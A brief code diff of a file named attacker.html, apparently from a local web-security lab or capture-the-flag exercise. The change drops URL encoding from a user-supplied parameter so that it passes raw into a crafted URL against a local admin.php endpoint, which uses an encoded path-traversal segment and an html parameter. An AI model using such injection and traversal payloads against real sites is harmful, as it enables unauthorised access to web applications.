--- a/attacker.html
+++ b/attacker.html
@@ -15,7 +15,7 @@
 
   function go() {
     const yRaw = new URL(location.href).searchParams.get("y") || "";
-    const yEnc = encodeURIComponent(yRaw); // 반드시 인코딩
+    const yEnc = yRaw
 
     // 변형 #1
     const v1 = "http://localhost:5000/admin.php%2F..%2Findex.php?html=" + yEnc;
